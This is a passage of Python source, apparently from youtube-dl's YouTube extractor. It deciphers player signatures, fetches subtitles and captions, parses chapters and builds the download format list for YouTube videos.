def report_rtmp_download(self):
"""Indicate the download will use the RTMP protocol."""
self.to_screen('RTMP download detected')
def _signature_cache_id(self, example_sig):
""" Return a string representation of a signature """
return '.'.join(compat_str(len(part)) for part in example_sig.split('.'))
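# For example, a signature like 'abcde.fgh' yields the cache id '5.3'.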
def _extract_signature_function(self, video_id, player_url, example_sig):
id_m = re.match(
r'.*?-(?P<id>[a-zA-Z0-9_-]+)(?:/watch_as3|/html5player(?:-new)?|(?:/[a-z]{2}_[A-Z]{2})?/base)?\.(?P<ext>[a-z]+)$',
player_url)
if not id_m:
raise ExtractorError('Cannot identify player %r' % player_url)
player_type = id_m.group('ext')
player_id = id_m.group('id')
# Read from filesystem cache
func_id = '%s_%s_%s' % (
player_type, player_id, self._signature_cache_id(example_sig))
assert os.path.basename(func_id) == func_id
cache_spec = self._downloader.cache.load('youtube-sigfuncs', func_id)
if cache_spec is not None:
return lambda s: ''.join(s[i] for i in cache_spec)
download_note = (
'Downloading player %s' % player_url
if self._downloader.params.get('verbose') else
'Downloading %s player %s' % (player_type, player_id)
)
if player_type == 'js':
code = self._download_webpage(
player_url, video_id,
note=download_note,
errnote='Download of %s failed' % player_url)
res = self._parse_sig_js(code)
elif player_type == 'swf':
urlh = self._request_webpage(
player_url, video_id,
note=download_note,
errnote='Download of %s failed' % player_url)
code = urlh.read()
res = self._parse_sig_swf(code)
else:
assert False, 'Invalid player type %r' % player_type
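# Run the extracted function on a probe string whose characters encode
# their own positions; the result reveals the permutation as a list of
# source indices (cache_spec), which is cached to disk so future
# signatures can be decrypted without re-downloading the player.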
test_string = ''.join(map(compat_chr, range(len(example_sig))))
cache_res = res(test_string)
cache_spec = [ord(c) for c in cache_res]
self._downloader.cache.store('youtube-sigfuncs', func_id, cache_spec)
return res
def _print_sig_code(self, func, example_sig):
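# Render the cached permutation spec as compact Python slice expressions
# so the decryption algorithm can be reported in a human-readable form
# (used when the youtube_print_sig_code option is enabled).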
def gen_sig_code(idxs):
def _genslice(start, end, step):
starts = '' if start == 0 else str(start)
ends = (':%d' % (end + step)) if end + step >= 0 else ':'
steps = '' if step == 1 else (':%d' % step)
return 's[%s%s%s]' % (starts, ends, steps)
step = None
# Quell pyflakes warnings - start will be set when step is set
start = '(Never used)'
for i, prev in zip(idxs[1:], idxs[:-1]):
if step is not None:
if i - prev == step:
continue
yield _genslice(start, prev, step)
step = None
continue
if i - prev in [-1, 1]:
step = i - prev
start = prev
continue
else:
yield 's[%d]' % prev
if step is None:
yield 's[%d]' % i
else:
yield _genslice(start, i, step)
test_string = ''.join(map(compat_chr, range(len(example_sig))))
cache_res = func(test_string)
cache_spec = [ord(c) for c in cache_res]
expr_code = ' + '.join(gen_sig_code(cache_spec))
signature_id_tuple = '(%s)' % (
', '.join(compat_str(len(p)) for p in example_sig.split('.')))
code = ('if tuple(len(p) for p in s.split(\'.\')) == %s:\n'
' return %s\n') % (signature_id_tuple, expr_code)
self.to_screen('Extracted signature function:\n' + code)
def _parse_sig_js(self, jscode):
funcname = self._search_regex(
(r'(["\'])signature\1\s*,\s*(?P<sig>[a-zA-Z0-9$]+)\(',
r'\.sig\|\|(?P<sig>[a-zA-Z0-9$]+)\(',
r'yt\.akamaized\.net/\)\s*\|\|\s*.*?\s*c\s*&&\s*d\.set\([^,]+\s*,\s*(?P<sig>[a-zA-Z0-9$]+)\(',
r'\bc\s*&&\s*d\.set\([^,]+\s*,\s*(?P<sig>[a-zA-Z0-9$]+)\('),
jscode, 'Initial JS player signature function name', group='sig')
jsi = JSInterpreter(jscode)
initial_function = jsi.extract_function(funcname)
return lambda s: initial_function([s])
def _parse_sig_swf(self, file_contents):
swfi = SWFInterpreter(file_contents)
TARGET_CLASSNAME = 'SignatureDecipher'
searched_class = swfi.extract_class(TARGET_CLASSNAME)
initial_function = swfi.extract_function(searched_class, 'decipher')
return lambda s: initial_function([s])
def _decrypt_signature(self, s, video_id, player_url, age_gate=False):
"""Turn the encrypted s field into a working signature"""
if player_url is None:
raise ExtractorError('Cannot decrypt signature without player_url')
if player_url.startswith('//'):
player_url = 'https:' + player_url
elif not re.match(r'https?://', player_url):
player_url = compat_urlparse.urljoin(
'https://www.youtube.com', player_url)
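# Signature functions are cached per (player URL, signature layout) so
# repeated formats of the same video don't re-download and re-parse the player.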
try:
player_id = (player_url, self._signature_cache_id(s))
if player_id not in self._player_cache:
func = self._extract_signature_function(
video_id, player_url, s
)
self._player_cache[player_id] = func
func = self._player_cache[player_id]
if self._downloader.params.get('youtube_print_sig_code'):
self._print_sig_code(func, s)
return func(s)
except Exception as e:
tb = traceback.format_exc()
raise ExtractorError(
'Signature extraction failed: ' + tb, cause=e)
def _get_subtitles(self, video_id, webpage):
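# Manually created subtitles are listed via the legacy timedtext API;
# each listed language is then offered in every ext from _SUBTITLE_FORMATS.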
try:
subs_doc = self._download_xml(
'https://video.google.com/timedtext?hl=en&type=list&v=%s' % video_id,
video_id, note=False)
except ExtractorError as err:
self._downloader.report_warning('unable to download video subtitles: %s' % error_to_compat_str(err))
return {}
sub_lang_list = {}
for track in subs_doc.findall('track'):
lang = track.attrib['lang_code']
if lang in sub_lang_list:
continue
sub_formats = []
for ext in self._SUBTITLE_FORMATS:
params = compat_urllib_parse_urlencode({
'lang': lang,
'v': video_id,
'fmt': ext,
'name': track.attrib['name'].encode('utf-8'),
})
sub_formats.append({
'url': 'https://www.youtube.com/api/timedtext?' + params,
'ext': ext,
})
sub_lang_list[lang] = sub_formats
if not sub_lang_list:
self._downloader.report_warning('video doesn\'t have subtitles')
return {}
return sub_lang_list
def _get_ytplayer_config(self, video_id, webpage):
patterns = (
# User data may contain arbitrary character sequences that may affect
# JSON extraction with regex, e.g. when '};' is contained the second
# regex won't capture the whole JSON. Work around this by trying the more
# specific regex first; proper quoted-string handling, to be implemented
# in the future, will replace this workaround (see
# https://github.com/rg3/youtube-dl/issues/7468,
# https://github.com/rg3/youtube-dl/pull/7599)
r';ytplayer\.config\s*=\s*({.+?});ytplayer',
r';ytplayer\.config\s*=\s*({.+?});',
)
config = self._search_regex(
patterns, webpage, 'ytplayer.config', default=None)
if config:
return self._parse_json(
uppercase_escape(config), video_id, fatal=False)
def _get_automatic_captions(self, video_id, webpage):
"""We need the webpage for getting the captions url, pass it as an
argument to speed up the process."""
self.to_screen('%s: Looking for automatic captions' % video_id)
player_config = self._get_ytplayer_config(video_id, webpage)
err_msg = 'Couldn\'t find automatic captions for %s' % video_id
if not player_config:
self._downloader.report_warning(err_msg)
return {}
try:
args = player_config['args']
caption_url = args.get('ttsurl')
if caption_url:
timestamp = args['timestamp']
# We get the available subtitles
list_params = compat_urllib_parse_urlencode({
'type': 'list',
'tlangs': 1,
'asrs': 1,
})
list_url = caption_url + '&' + list_params
caption_list = self._download_xml(list_url, video_id)
original_lang_node = caption_list.find('track')
if original_lang_node is None:
self._downloader.report_warning('Video doesn\'t have automatic captions')
return {}
original_lang = original_lang_node.attrib['lang_code']
caption_kind = original_lang_node.attrib.get('kind', '')
sub_lang_list = {}
for lang_node in caption_list.findall('target'):
sub_lang = lang_node.attrib['lang_code']
sub_formats = []
for ext in self._SUBTITLE_FORMATS:
params = compat_urllib_parse_urlencode({
'lang': original_lang,
'tlang': sub_lang,
'fmt': ext,
'ts': timestamp,
'kind': caption_kind,
})
sub_formats.append({
'url': caption_url + '&' + params,
'ext': ext,
})
sub_lang_list[sub_lang] = sub_formats
return sub_lang_list
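# Build a {language: [format dicts]} mapping by rewriting the base
# caption URL's query string for every target language and subtitle format.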
def make_captions(sub_url, sub_langs):
parsed_sub_url = compat_urllib_parse_urlparse(sub_url)
caption_qs = compat_parse_qs(parsed_sub_url.query)
captions = {}
for sub_lang in sub_langs:
sub_formats = []
for ext in self._SUBTITLE_FORMATS:
caption_qs.update({
'tlang': [sub_lang],
'fmt': [ext],
})
sub_url = compat_urlparse.urlunparse(parsed_sub_url._replace(
query=compat_urllib_parse_urlencode(caption_qs, True)))
sub_formats.append({
'url': sub_url,
'ext': ext,
})
captions[sub_lang] = sub_formats
return captions
# New captions format as of 22.06.2017
player_response = args.get('player_response')
if player_response and isinstance(player_response, compat_str):
player_response = self._parse_json(
player_response, video_id, fatal=False)
if player_response:
renderer = player_response['captions']['playerCaptionsTracklistRenderer']
base_url = renderer['captionTracks'][0]['baseUrl']
sub_lang_list = []
for lang in renderer['translationLanguages']:
lang_code = lang.get('languageCode')
if lang_code:
sub_lang_list.append(lang_code)
return make_captions(base_url, sub_lang_list)
# Some videos don't provide ttsurl but rather caption_tracks and
# caption_translation_languages (e.g. 20LmZk1hakA)
# No longer used as of 22.06.2017
caption_tracks = args['caption_tracks']
caption_translation_languages = args['caption_translation_languages']
caption_url = compat_parse_qs(caption_tracks.split(',')[0])['u'][0]
sub_lang_list = []
for lang in caption_translation_languages.split(','):
lang_qs = compat_parse_qs(compat_urllib_parse_unquote_plus(lang))
sub_lang = lang_qs.get('lc', [None])[0]
if sub_lang:
sub_lang_list.append(sub_lang)
return make_captions(caption_url, sub_lang_list)
# An extractor error can be raised by the download process if there are
# no automatic captions but there are subtitles
except (KeyError, IndexError, ExtractorError):
self._downloader.report_warning(err_msg)
return {}
def _mark_watched(self, video_id, video_info):
playback_url = video_info.get('videostats_playback_base_url', [None])[0]
if not playback_url:
return
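# Append a version number and a client playback nonce (cpn) to the
# playback-stats URL and fetch it so the video is marked as watched.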
parsed_playback_url = compat_urlparse.urlparse(playback_url)
qs = compat_urlparse.parse_qs(parsed_playback_url.query)
# The cpn generation algorithm is reverse engineered from base.js.
# In fact it works even with a dummy cpn.
CPN_ALPHABET = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_'
cpn = ''.join((CPN_ALPHABET[random.randint(0, 256) & 63] for _ in range(0, 16)))
qs.update({
'ver': ['2'],
'cpn': [cpn],
})
playback_url = compat_urlparse.urlunparse(
parsed_playback_url._replace(query=compat_urllib_parse_urlencode(qs, True)))
self._download_webpage(
playback_url, video_id, 'Marking watched',
'Unable to mark watched', fatal=False)
@staticmethod
def _extract_urls(webpage):
# Embedded YouTube player
entries = [
unescapeHTML(mobj.group('url'))
for mobj in re.finditer(r'''(?x)
(?:
<iframe[^>]+?src=|
data-video-url=|
<embed[^>]+?src=|
embedSWF\(?:\s*|
<object[^>]+data=|
new\s+SWFObject\(
)
(["\'])
(?P<url>(?:https?:)?//(?:www\.)?youtube(?:-nocookie)?\.com/
(?:embed|v|p)/[0-9A-Za-z_-]{11}.*?)
\1''', webpage)]
# lazyYT YouTube embed
entries.extend(list(map(
unescapeHTML,
re.findall(r'class="lazyYT" data-youtube-id="([^"]+)"', webpage))))
# Wordpress "YouTube Video Importer" plugin
matches = re.findall(r'''(?x)<div[^>]+
class=(?P<q1>[\'"])[^\'"]*\byvii_single_video_player\b[^\'"]*(?P=q1)[^>]+
data-video_id=(?P<q2>[\'"])([^\'"]+)(?P=q2)''', webpage)
entries.extend(m[-1] for m in matches)
return entries
@staticmethod
def _extract_url(webpage):
urls = YoutubeIE._extract_urls(webpage)
return urls[0] if urls else None
@classmethod
def extract_id(cls, url):
mobj = re.match(cls._VALID_URL, url, re.VERBOSE)
if mobj is None:
raise ExtractorError('Invalid URL: %s' % url)
video_id = mobj.group(2)
return video_id
def _extract_annotations(self, video_id):
url = 'https://www.youtube.com/annotations_invideo?features=1&legacy=1&video_id=%s' % video_id
return self._download_webpage(url, video_id, note='Searching for annotations.', errnote='Unable to download video annotations.')
@staticmethod
def _extract_chapters(description, duration):
if not description:
return None
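# Chapter markers are description links that seek the player to a timestamp;
# pair each timestamp with the next one (or the video duration) to derive
# start/end times for every chapter.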
chapter_lines = re.findall(
r'(?:^|<br\s*/>)([^<]*<a[^>]+onclick=["\']yt\.www\.watch\.player\.seekTo[^>]+>(\d{1,2}:\d{1,2}(?::\d{1,2})?)</a>[^>]*)(?=$|<br\s*/>)',
description)
if not chapter_lines:
return None
chapters = []
for next_num, (chapter_line, time_point) in enumerate(
chapter_lines, start=1):
start_time = parse_duration(time_point)
if start_time is None:
continue
if start_time > duration:
break
end_time = (duration if next_num == len(chapter_lines)
else parse_duration(chapter_lines[next_num][1]))
if end_time is None:
continue
if end_time > duration:
end_time = duration
if start_time > end_time:
break
chapter_title = re.sub(
r'<a[^>]+>[^<]+</a>', '', chapter_line).strip(' \t-')
chapter_title = re.sub(r'\s+', ' ', chapter_title)
chapters.append({
'start_time': start_time,
'end_time': end_time,
'title': chapter_title,
})
return chapters
def _real_extract(self, url):
url, smuggled_data = unsmuggle_url(url, {})
proto = (
'http' if self._downloader.params.get('prefer_insecure', False)
else 'https')
start_time = None
end_time = None
parsed_url = compat_urllib_parse_urlparse(url)
for component in [parsed_url.fragment, parsed_url.query]:
query = compat_parse_qs(component)
if start_time is None and 't' in query:
start_time = parse_duration(query['t'][0])
if start_time is None and 'start' in query:
start_time = parse_duration(query['start'][0])
if end_time is None and 'end' in query:
end_time = parse_duration(query['end'][0])
# Extract the original video URL from a redirecting URL (e.g. age verification) using the next_url parameter
mobj = re.search(self._NEXT_URL_RE, url)
if mobj:
url = proto + '://www.youtube.com/' + compat_urllib_parse_unquote(mobj.group(1)).lstrip('/')
video_id = self.extract_id(url)
# Get video webpage
url = proto + '://www.youtube.com/watch?v=%s&gl=US&hl=en&has_verified=1&bpctr=9999999999' % video_id
video_webpage = self._download_webpage(url, video_id)
# Attempt to extract SWF player URL
mobj = re.search(r'swfConfig.*?"(https?:\\/\\/.*?watch.*?-.*?\.swf)"', video_webpage)
if mobj is not None:
player_url = re.sub(r'\\(.)', r'\1', mobj.group(1))
else:
player_url = None
dash_mpds = []
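# Collect every distinct DASH manifest URL encountered along the way;
# formats from all of them are merged further below.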
def add_dash_mpd(video_info):
dash_mpd = video_info.get('dashmpd')
if dash_mpd and dash_mpd[0] not in dash_mpds:
dash_mpds.append(dash_mpd[0])
is_live = None
view_count = None
def extract_view_count(v_info):
return int_or_none(try_get(v_info, lambda x: x['view_count'][0]))
# Get video info
embed_webpage = None
if re.search(r'player-age-gate-content">', video_webpage) is not None:
age_gate = True
# We simulate access to the video from www.youtube.com/v/{video_id},
# which can be viewed without logging into YouTube
url = proto + '://www.youtube.com/embed/%s' % video_id
embed_webpage = self._download_webpage(url, video_id, 'Downloading embed webpage')
data = compat_urllib_parse_urlencode({
'video_id': video_id,
'eurl': 'https://youtube.googleapis.com/v/' + video_id,
'sts': self._search_regex(
r'"sts"\s*:\s*(\d+)', embed_webpage, 'sts', default=''),
})
video_info_url = proto + '://www.youtube.com/get_video_info?' + data
video_info_webpage = self._download_webpage(
video_info_url, video_id,
note='Refetching age-gated info webpage',
errnote='unable to download video info webpage')
video_info = compat_parse_qs(video_info_webpage)
add_dash_mpd(video_info)
else:
age_gate = False
video_info = None
sts = None
# Try looking directly into the video webpage
ytplayer_config = self._get_ytplayer_config(video_id, video_webpage)
if ytplayer_config:
args = ytplayer_config['args']
if args.get('url_encoded_fmt_stream_map') or args.get('hlsvp'):
# Convert to the same format returned by compat_parse_qs
video_info = dict((k, [v]) for k, v in args.items())
add_dash_mpd(video_info)
# The rental video is not rented but a preview is available (e.g.
# https://www.youtube.com/watch?v=yYr8q0y5Jfg,
# https://github.com/rg3/youtube-dl/issues/10532)
if not video_info and args.get('ypc_vid'):
return self.url_result(
args['ypc_vid'], YoutubeIE.ie_key(), video_id=args['ypc_vid'])
if args.get('livestream') == '1' or args.get('live_playback') == 1:
is_live = True
sts = ytplayer_config.get('sts')
if not video_info or self._downloader.params.get('youtube_include_dash_manifest', True):
# We also try looking in get_video_info since it may contain a different dashmpd
# URL that points to a DASH manifest with a possibly different itag set (some itags
# are missing from the DASH manifest pointed to by the webpage's dashmpd, others from
# the DASH manifest pointed to by get_video_info's dashmpd).
# The general idea is to take a union of itags from both DASH manifests (for an example
# of a video with such 'manifest behavior' see https://github.com/rg3/youtube-dl/issues/6093)
self.report_video_info_webpage_download(video_id)
for el in ('info', 'embedded', 'detailpage', 'vevo', ''):
query = {
'video_id': video_id,
'ps': 'default',
'eurl': '',
'gl': 'US',
'hl': 'en',
}
if el:
query['el'] = el
if sts:
query['sts'] = sts
video_info_webpage = self._download_webpage(
'%s://www.youtube.com/get_video_info' % proto,
video_id, note=False,
errnote='unable to download video info webpage',
fatal=False, query=query)
if not video_info_webpage:
continue
get_video_info = compat_parse_qs(video_info_webpage)
add_dash_mpd(get_video_info)
if view_count is None:
view_count = extract_view_count(get_video_info)
if not video_info:
video_info = get_video_info
if 'token' in get_video_info:
# Different get_video_info requests may report different results, e.g.
# some may report video unavailability, but some may serve it without
# any complaint (see https://github.com/rg3/youtube-dl/issues/7362,
# the original webpage as well as el=info and el=embedded get_video_info
# requests report video unavailability due to geo restriction while
# el=detailpage succeeds and returns valid data). This is probably
# due to YouTube measures against IP ranges of hosting providers.
# Work around this by preferring the first successful video_info containing
# the token if no such video_info has been found yet.
if 'token' not in video_info:
video_info = get_video_info
break
def extract_unavailable_message():
return self._html_search_regex(
r'(?s)<h1[^>]+id="unavailable-message"[^>]*>(.+?)</h1>',
video_webpage, 'unavailable message', default=None)
if 'token' not in video_info:
if 'reason' in video_info:
if 'The uploader has not made this video available in your country.' in video_info['reason']:
regions_allowed = self._html_search_meta(
'regionsAllowed', video_webpage, default=None)
countries = regions_allowed.split(',') if regions_allowed else None
self.raise_geo_restricted(
msg=video_info['reason'][0], countries=countries)
reason = video_info['reason'][0]
if 'Invalid parameters' in reason:
unavailable_message = extract_unavailable_message()
if unavailable_message:
reason = unavailable_message
raise ExtractorError(
'YouTube said: %s' % reason,
expected=True, video_id=video_id)
else:
raise ExtractorError(
'"token" parameter not in video info for unknown reason',
video_id=video_id)
# title
if 'title' in video_info:
video_title = video_info['title'][0]
else:
self._downloader.report_warning('Unable to extract video title')
video_title = '_'
# description
description_original = video_description = get_element_by_id("eow-description", video_webpage)
if video_description:
def replace_url(m):
redir_url = compat_urlparse.urljoin(url, m.group(1))
parsed_redir_url = compat_urllib_parse_urlparse(redir_url)
if re.search(r'^(?:www\.)?(?:youtube(?:-nocookie)?\.com|youtu\.be)$', parsed_redir_url.netloc) and parsed_redir_url.path == '/redirect':
qs = compat_parse_qs(parsed_redir_url.query)
q = qs.get('q')
if q and q[0]:
return q[0]
return redir_url
description_original = video_description = re.sub(r'''(?x)
<a\s+
(?:[a-zA-Z-]+="[^"]*"\s+)*?
(?:title|href)="([^"]+)"\s+
(?:[a-zA-Z-]+="[^"]*"\s+)*?
class="[^"]*"[^>]*>
[^<]+\.{3}\s*
</a>
''', replace_url, video_description)
video_description = clean_html(video_description)
else:
fd_mobj = re.search(r'<meta name="description" content="([^"]+)"', video_webpage)
if fd_mobj:
video_description = unescapeHTML(fd_mobj.group(1))
else:
video_description = ''
if 'multifeed_metadata_list' in video_info and not smuggled_data.get('force_singlefeed', False):
if not self._downloader.params.get('noplaylist'):
entries = []
feed_ids = []
multifeed_metadata_list = video_info['multifeed_metadata_list'][0]
for feed in multifeed_metadata_list.split(','):
# Unquote should take place before split on comma (,) since textual
# fields may contain commas as well (see
# https://github.com/rg3/youtube-dl/issues/8536)
feed_data = compat_parse_qs(compat_urllib_parse_unquote_plus(feed))
entries.append({
'_type': 'url_transparent',
'ie_key': 'Youtube',
'url': smuggle_url(
'%s://www.youtube.com/watch?v=%s' % (proto, feed_data['id'][0]),
{'force_singlefeed': True}),
'title': '%s (%s)' % (video_title, feed_data['title'][0]),
})
feed_ids.append(feed_data['id'][0])
self.to_screen(
'Downloading multifeed video (%s) - add --no-playlist to just download video %s'
% (', '.join(feed_ids), video_id))
return self.playlist_result(entries, video_id, video_title, video_description)
self.to_screen('Downloading just video %s because of --no-playlist' % video_id)
if view_count is None:
view_count = extract_view_count(video_info)
# Check for "rental" videos
if 'ypc_video_rental_bar_text' in video_info and 'author' not in video_info:
raise ExtractorError('"rental" videos not supported. See https://github.com/rg3/youtube-dl/issues/359 for more information.', expected=True)
def _extract_filesize(media_url):
return int_or_none(self._search_regex(
r'\bclen[=/](\d+)', media_url, 'filesize', default=None))
if 'conn' in video_info and video_info['conn'][0].startswith('rtmp'):
self.report_rtmp_download()
formats = [{
'format_id': '_rtmp',
'protocol': 'rtmp',
'url': video_info['conn'][0],
'player_url': player_url,
}]
elif not is_live and (len(video_info.get('url_encoded_fmt_stream_map', [''])[0]) >= 1 or len(video_info.get('adaptive_fmts', [''])[0]) >= 1):
encoded_url_map = video_info.get('url_encoded_fmt_stream_map', [''])[0] + ',' + video_info.get('adaptive_fmts', [''])[0]
if 'rtmpe%3Dyes' in encoded_url_map:
raise ExtractorError('rtmpe downloads are not supported, see https://github.com/rg3/youtube-dl/issues/343 for more information.', expected=True)
formats_spec = {}
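# fmt_list maps itags to 'WIDTHxHEIGHT' strings; use it to fill in
# per-video dimensions on top of the static _formats defaults.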
fmt_list = video_info.get('fmt_list', [''])[0]
if fmt_list:
for fmt in fmt_list.split(','):
spec = fmt.split('/')
if len(spec) > 1:
width_height = spec[1].split('x')
if len(width_height) == 2:
formats_spec[spec[0]] = {
'resolution': spec[1],
'width': int_or_none(width_height[0]),
'height': int_or_none(width_height[1]),
}
q = qualities(['small', 'medium', 'hd720'])
formats = []
for url_data_str in encoded_url_map.split(','):
url_data = compat_parse_qs(url_data_str)
if 'itag' not in url_data or 'url' not in url_data:
continue
format_id = url_data['itag'][0]
url = url_data['url'][0]
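# Formats with an encrypted signature ('s' in url_data) need the JS/SWF
# player to decrypt it, so locate the player URL here; a plain 'sig'
# value is simply appended to the media URL as-is.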
if 's' in url_data or self._downloader.params.get('youtube_include_dash_manifest', True):
ASSETS_RE = r'"assets":.+?"js":\s*("[^"]+")'
jsplayer_url_json = self._search_regex(
ASSETS_RE,
embed_webpage if age_gate else video_webpage,
'JS player URL (1)', default=None)
if not jsplayer_url_json and not age_gate:
# We need the embed website after all
if embed_webpage is None:
embed_url = proto + '://www.youtube.com/embed/%s' % video_id
embed_webpage = self._download_webpage(
embed_url, video_id, 'Downloading embed webpage')
jsplayer_url_json = self._search_regex(
ASSETS_RE, embed_webpage, 'JS player URL')
player_url = json.loads(jsplayer_url_json)
if player_url is None:
player_url_json = self._search_regex(
r'ytplayer\.config.*?"url"\s*:\s*("[^"]+")',
video_webpage, 'age gate player URL')
player_url = json.loads(player_url_json)
if 'sig' in url_data:
url += '&signature=' + url_data['sig'][0]
elif 's' in url_data:
encrypted_sig = url_data['s'][0]
if self._downloader.params.get('verbose'):
if player_url is None:
player_version = 'unknown'
player_desc = 'unknown'
else:
if player_url.endswith('swf'):
player_version = self._search_regex(
r'-(.+?)(?:/watch_as3)?\.swf$', player_url,
'flash player', fatal=False)
player_desc = 'flash player %s' % player_version
else:
player_version = self._search_regex(
[r'html5player-([^/]+?)(?:/html5player(?:-new)?)?\.js',
r'(?:www|player)-([^/]+)(?:/[a-z]{2}_[A-Z]{2})?/base\.js'],
player_url,
'html5 player', fatal=False)
player_desc = 'html5 player %s' % player_version
parts_sizes = self._signature_cache_id(encrypted_sig)
self.to_screen('{%s} signature length %s, %s' %
(format_id, parts_sizes, player_desc))
signature = self._decrypt_signature(
encrypted_sig, video_id, player_url, age_gate)
url += '&signature=' + signature
if 'ratebypass' not in url:
url += '&ratebypass=yes'
dct = {
'format_id': format_id,
'url': url,
'player_url': player_url,
}
if format_id in self._formats:
dct.update(self._formats[format_id])
if format_id in formats_spec:
dct.update(formats_spec[format_id])
# Some itags are not included in the DASH manifest, so the corresponding formats
# will lack metadata (see https://github.com/rg3/youtube-dl/pull/5993).
# Try to extract metadata from the url_encoded_fmt_stream_map entry instead.
mobj = re.search(r'^(?P<width>\d+)[xX](?P<height>\d+)$', url_data.get('size', [''])[0])
width, height = (int(mobj.group('width')), int(mobj.group('height'))) if mobj else (None, None)
filesize = int_or_none(url_data.get(
'clen', [None])[0]) or _extract_filesize(url)
quality = url_data.get('quality_label', [None])[0] or url_data.get('quality', [None])[0]
more_fields = {
'filesize': filesize,
'tbr': float_or_none(url_data.get('bitrate', [None])[0], 1000),
'width': width,
'height': height,
'fps': int_or_none(url_data.get('fps', [None])[0]),
'format_note': quality,
'quality': q(quality),
}
for key, value in more_fields.items():
if value:
dct[key] = value
type_ = url_data.get('type', [None])[0]
if type_:
type_split = type_.split(';')
kind_ext = type_split[0].split('/')
if len(kind_ext) == 2:
kind, _ = kind_ext
dct['ext'] = mimetype2ext(type_split[0])
if kind in ('audio', 'video'):
codecs = None
for mobj in re.finditer(
r'(?P<key>[a-zA-Z_-]+)=(?P<quote>["\']?)(?P<val>.+?)(?P=quote)(?:;|$)', type_):
if mobj.group('key') == 'codecs':
codecs = mobj.group('val')
break
if codecs:
dct.update(parse_codecs(codecs))
if dct.get('acodec') == 'none' or dct.get('vcodec') == 'none':
dct['downloader_options'] = {
# YouTube throttles chunks larger than ~10M
'http_chunk_size': 10485760,
}
formats.append(dct)
elif video_info.get('hlsvp'):
manifest_url = video_info['hlsvp'][0]
formats = []
m3u8_formats = self._extract_m3u8_formats(
manifest_url, video_id, 'mp4', fatal=False)
for a_format in m3u8_formats:
itag = self._search_regex(
r'/itag/(\d+)/', a_format['url'], 'itag', default=None)
if itag:
a_format['format_id'] = itag
if itag in self._formats:
dct = self._formats[itag].copy()
dct.update(a_format)
a_format = dct
a_format['player_url'] = player_url
# The Accept-Encoding header causes failures in live streams on YouTube and YouTube Gaming
a_format.setdefault('http_headers', {})['Youtubedl-no-compression'] = 'True'
formats.append(a_format)
else:
error_message = clean_html(video_info.get('reason', [None])[0])
if not error_message:
error_message = extract_unavailable_message()
if error_message:
raise ExtractorError(error_message, expected=True)
raise ExtractorError('no conn, hlsvp or url_encoded_fmt_stream_map information found in video info')
# uploader
video_uploader = try_get(video_info, lambda x: x['author'][0], compat_str)
if video_uploader:
video_uploader = compat_urllib_parse_unquote_plus(video_uploader)
else:
self._downloader.report_warning('unable to extract uploader name')
# uploader_id
video_uploader_id = None
video_uploader_url = None
mobj = re.search(
r'<link itemprop="url" href="(?P<uploader_url>https?://www\.youtube\.com/(?:user|channel)/(?P<uploader_id>[^"]+))">',
video_webpage)
if mobj is not None:
video_uploader_id = mobj.group('uploader_id')
video_uploader_url = mobj.group('uploader_url')
else:
self._downloader.report_warning('unable to extract uploader nickname')
# thumbnail image
# We first try to get a high-quality image:
m_thumb = re.search(r'<span itemprop="thumbnail".*?href="(.*?)">',
video_webpage, re.DOTALL)
if m_thumb is not None:
video_thumbnail = m_thumb.group(1)
elif 'thumbnail_url' not in video_info:
self._downloader.report_warning('unable to extract video thumbnail')
video_thumbnail = None
else: # don't panic if we can't find it
video_thumbnail = compat_urllib_parse_unquote_plus(video_info['thumbnail_url'][0])
# upload date
upload_date = self._html_search_meta(
'datePublished', video_webpage, 'upload date', default=None)
if not upload_date:
upload_date = self._search_regex(
[r'(?s)id="eow-date.*?>(.*?)</span>',
r'(?:id="watch-uploader-info".*?>.*?|["\']simpleText["\']\s*:\s*["\'])(?:Published|Uploaded|Streamed live|Started) on (.+?)[<"\']'],
video_webpage, 'upload date', default=None)
upload_date = unified_strdate(upload_date)
video_license = self._html_search_regex(
r'<h4[^>]+class="title"[^>]*>\s*License\s*</h4>\s*<ul[^>]*>\s*<li>(.+?)</li',
video_webpage, 'license', default=None)
m_music = re.search(
r'''(?x)
<h4[^>]+class="title"[^>]*>\s*Music\s*</h4>\s*
<ul[^>]*>\s*
<li>(?P<title>.+?)
by (?P<creator>.+?)
(?:
\(.+?\)|
<a[^>]*
(?:
\bhref=["\']/red[^>]*>| # drop possible
>\s*Listen ad-free with YouTube Red # YouTube Red ad
)
.*?
)?</li
''',
video_webpage)
if m_music:
video_alt_title = remove_quotes(unescapeHTML(m_music.group('title')))
video_creator = clean_html(m_music.group('creator'))
else:
video_alt_title = video_creator = None
def extract_meta(field):
return self._html_search_regex(
r'<h4[^>]+class="title"[^>]*>\s*%s\s*</h4>\s*<ul[^>]*>\s*<li>(.+?)</li>\s*' % field,
video_webpage, field, default=None)
track = extract_meta('Song')
artist = extract_meta('Artist')
m_episode = re.search(
r'<div[^>]+id="watch7-headline"[^>]*>\s*<span[^>]*>.*?>(?P<series>[^<]+)</a></b>\s*S(?P<season>\d+)\s*•\s*E(?P<episode>\d+)</span>',
video_webpage)
if m_episode:
series = m_episode.group('series')
season_number = int(m_episode.group('season'))
episode_number = int(m_episode.group('episode'))
else:
series = season_number = episode_number = None
m_cat_container = self._search_regex(
r'(?s)<h4[^>]*>\s*Category\s*</h4>\s*<ul[^>]*>(.*?)</ul>',
video_webpage, 'categories', default=None)
if m_cat_container:
category = self._html_search_regex(
r'(?s)<a[^<]+>(.*?)</a>', m_cat_container, 'category',
default=None)
video_categories = None if category is None else [category]
else:
video_categories = None
video_tags = [
unescapeHTML(m.group('content'))
for m in re.finditer(self._meta_regex('og:video:tag'), video_webpage)]
def _extract_count(count_name):
return str_to_int(self._search_regex(
r'-%s-button[^>]+><span[^>]+class="yt-uix-button-content"[^>]*>([\d,]+)</span>'
% re.escape(count_name),
video_webpage, count_name, default=None))
like_count = _extract_count('like')
dislike_count = _extract_count('dislike')
# subtitles
video_subtitles = self.extract_subtitles(video_id, video_webpage)
automatic_captions = self.extract_automatic_captions(video_id, video_webpage)
video_duration = try_get(
video_info, lambda x: int_or_none(x['length_seconds'][0]))
if not video_duration:
video_duration = parse_duration(self._html_search_meta(
'duration', video_webpage, 'video duration'))
# annotations
video_annotations = None
if self._downloader.params.get('writeannotations', False):
video_annotations = self._extract_annotations(video_id)
chapters = self._extract_chapters(description_original, video_duration)
# Look for the DASH manifest
if self._downloader.params.get('youtube_include_dash_manifest', True):
dash_mpd_fatal = True
for mpd_url in dash_mpds:
dash_formats = {}
try:
def decrypt_sig(mobj):
s = mobj.group(1)
